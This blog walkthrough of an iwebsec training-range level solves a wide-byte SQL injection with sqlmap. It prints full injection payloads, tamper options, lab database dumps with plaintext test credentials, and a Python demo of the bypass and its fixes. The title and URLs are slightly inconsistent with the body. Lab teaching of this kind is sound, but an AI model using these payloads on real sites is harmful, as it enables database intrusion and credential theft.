iwebsec Range: SQL Injection Vulnerability Walkthrough Notes 1 - Numeric Injection | mooyuan's blog - CSDN Blog
Open the range; the URL is http://192.168.71.151/sqli/02.php?id=1, as shown below

As shown below, a wide-byte injection vulnerability exists and the closing character is a single quote

First construct the sqlmap command; the URL is http://192.168.71.151/sqli/02.php?id=1
Obviously, running the following command as-is will not succeed:
sqlmap -u http://192.168.71.151/sqli/02.php?id=1 --current-db --dump --batch
because this is a wide-byte injection vulnerability and sqlmap's default approach will not get through

Change id=1 in the URL to id=1%df*, that is, append the wide-byte marker %df after the parameter value 1 and then add * after it
sqlmap -u http://192.168.71.151/sqli/01.php?id=1%df* --current-db --dump --batch
The complete interaction is shown below
[21:46:26] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1260 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 5388 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5388=5388,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 2061 FROM (SELECT(SLEEP(5)))lOnr)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://192.168.71.151:80/sqli/01.php?id=-7105 UNION ALL SELECT CONCAT(0x7178707a71,0x706b715151526771476f687a6e4c71617a504e4e5a644541656d6b4f45757642636c43795276784f,0x7171767a71),9687,9687#
---
[21:46:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:46:26] [INFO] fetching current database
current database: 'iwebsec'
[21:46:26] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:46:26] [INFO] fetching current database
[21:46:26] [INFO] fetching tables for database: 'iwebsec'
[21:46:26] [INFO] retrieved: 'sqli'
[21:46:26] [INFO] retrieved: 'user'
[21:46:27] [INFO] retrieved: 'users'
[21:46:27] [INFO] retrieved: 'xss'
[21:46:27] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'name','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[21:46:27] [INFO] retrieved: '7','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '6','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '5','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '1','iwebsec'
[21:46:27] [INFO] retrieved: '8','<?php phpinfo();?>'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[21:46:27] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:46:27] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'user' in database 'iwebsec'
[21:46:27] [INFO] retrieved: '1','pass1','user1'
[21:46:27] [INFO] retrieved: '2','pass2','user2'
[21:46:27] [INFO] retrieved: '3','pass3','user3'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[21:46:27] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:46:27] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'role','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[21:46:27] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:46:27] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'email','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'user1@iwebsec.com','1','pass1','user1'
[21:46:27] [INFO] retrieved: 'user2@iwebsec.com','2','pass2','user2'
[21:46:27] [INFO] retrieved: 'user3@iwebsec.com','3','pass3','user3'
[21:46:27] [INFO] retrieved: 'user4@iwebsec.com','4','admin','admin'
[21:46:27] [INFO] retrieved: '123@123.com','5','123','123'
[21:46:27] [INFO] retrieved: '1234@123.com','6','123','ctfs' or updatexml(1,concat(0x7e,(version())),0)#'
[21:46:27] [INFO] retrieved: 'iwebsec02@iwebsec.com','7','123456','iwebsec' or updatexml(1,concat(0x7e,(version())),0)#'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[21:46:27] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:46:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:46:27] [WARNING] your sqlmap version is outdated
[*] ending @ 21:46:27 /2022-11-24/
Add the wide-byte tamper script: --tamper unmagicquotes
sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch --tamper unmagicquotes
The complete interaction is shown below
kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch --tamper unmagicquotes
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:53:15 /2022-11-24/
[21:53:15] [INFO] loading tamper module 'unmagicquotes'
[21:53:15] [INFO] resuming back-end DBMS 'mysql'
[21:53:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (2397=2397) THEN 1 ELSE (SELECT 9949 UNION SELECT 5355) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2678 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(2678=2678,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3668 FROM (SELECT(SLEEP(5)))vjAy)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6b71,0x456c514d62616f4b7a7651664c6f6b4e72567142766663796152416b674642714e7350626d456542,0x716b7a6271),NULL,NULL-- -
---
[21:53:15] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:53:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[21:53:15] [INFO] fetching current database
current database: 'iwebsec'
[21:53:15] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:53:15] [INFO] fetching current database
[21:53:15] [INFO] fetching tables for database: 'iwebsec'
[21:53:15] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[21:53:15] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:53:15] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[21:53:15] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:53:15] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[21:53:15] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:53:15] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[21:53:15] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:53:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:53:15] [WARNING] your sqlmap version is outdated
[*] ending @ 21:53:15 /2022-11-24/
Capture the request with Burp Suite (BP) and save it as iwebsec02.txt

Edit iwebsec02.txt, changing id=1 to id=1%df'* as shown in the figure below

Note: according to the source analysis, %df here is the wide byte, ' closes the single quote, and * is placed after the closing ' to tell sqlmap that this is the injection point. The injection command is therefore
sqlmap -r iwebsec02.txt --current-db --dump --batch
As shown below, the injection succeeds

Since the complete sqlmap interaction has already been shown above, the full process is not listed again here.
The level exploited this time is a character-type injection; in summary, as the second level it is relatively demanding.
Let's review the key points of this SQL injection through the source code:
(1) What is the closing method? iwebsec level 02 is character-type, closed with a single quote
(2) What is the injection category? This is wide-byte injection, which requires %df
(3) Are keywords filtered? It is clear from the source that the iwebsec character-type level filters nothing
Once these points are understood, the SQL injection test can be targeted precisely, and using sqlmap makes it far more efficient. That concludes the level 2 injection content; beginners are advised to practice manual injection step by step first and only then move on to sqlmap.
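The wide-byte mechanism this level depends on (the %df byte absorbing the escaping backslash, as used for the id=1%df* payload above and summarised in point (2) of the analysis) and the two fixes a defender would apply can be shown in a few lines of Python. This is an added example, not code from the original post or from the iwebsec project; it simulates the PHP-style byte-level addslashes() escaping and the GBK decoding that the source analysis implies. The function names and the constructed payload bytes are assumptions made for the demonstration.

```python
# Added example (not from the original post or the iwebsec project).
# Simulates why byte-level addslashes()-style escaping fails when the
# MySQL connection decodes input as GBK, and shows two mitigations.
# The payload bytes below are constructed for the demonstration.

PAYLOAD = b"1\xdf'"  # the URL-decoded form of id=1%df' used in the post


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes()-style escaping: prepend a backslash (0x5C) to
    ' " \\ and NUL at the byte level, without regard to the charset."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def sql_view_gbk(escaped: bytes) -> str:
    """What a GBK-charset connection sees: a lead byte in 0x81-0xFE
    followed by 0x5C forms one two-byte character, so the inserted
    backslash is absorbed and the quote after it is left unescaped."""
    return escaped.decode("gbk", errors="replace")


def has_bare_quote(fragment: str) -> bool:
    """True if any single quote is not preceded by a backslash character.
    Usable as a simple detection check on decoded request parameters."""
    return any(
        ch == "'" and (i == 0 or fragment[i - 1] != "\\")
        for i, ch in enumerate(fragment)
    )


def escape_charset_aware(raw: bytes) -> bytes:
    """Mitigation 1: decode with the connection charset first, then escape
    per character and re-encode. This is the effect of a charset-aware
    escaper (mysqli_set_charset plus mysqli_real_escape_string): an orphan
    0xDF lead byte can no longer pair with the backslash. Invalid bytes
    become U+FFFD on decode and are re-encoded as '?'."""
    text = raw.decode("gbk", errors="replace")
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode("gbk", errors="replace")


def parse_numeric_id(raw: bytes):
    """Mitigation 2 (preferred for a numeric id): accept ASCII digits only
    and bind the integer as a query parameter; anything else is rejected."""
    return int(raw) if raw.isdigit() else None


if __name__ == "__main__":
    naive = sql_view_gbk(addslashes(PAYLOAD))
    print("naive escaping as MySQL sees it:", repr(naive),
          "bare quote:", has_bare_quote(naive))
    hardened = escape_charset_aware(PAYLOAD).decode("gbk")
    print("charset-aware escaping:", repr(hardened),
          "bare quote:", has_bare_quote(hardened))
    print("numeric id parse:", parse_numeric_id(PAYLOAD), parse_numeric_id(b"1"))
```

Running the block shows the naive path collapsing the bytes 0xDF 0x5C into a single CJK character so that the trailing quote is bare, while the charset-aware path keeps the quote escaped and the integer parse rejects the payload outright. Of the two mitigations, binding a validated integer is the one to reach for on a numeric id; charset-aware escaping matters for genuinely textual parameters on a GBK connection.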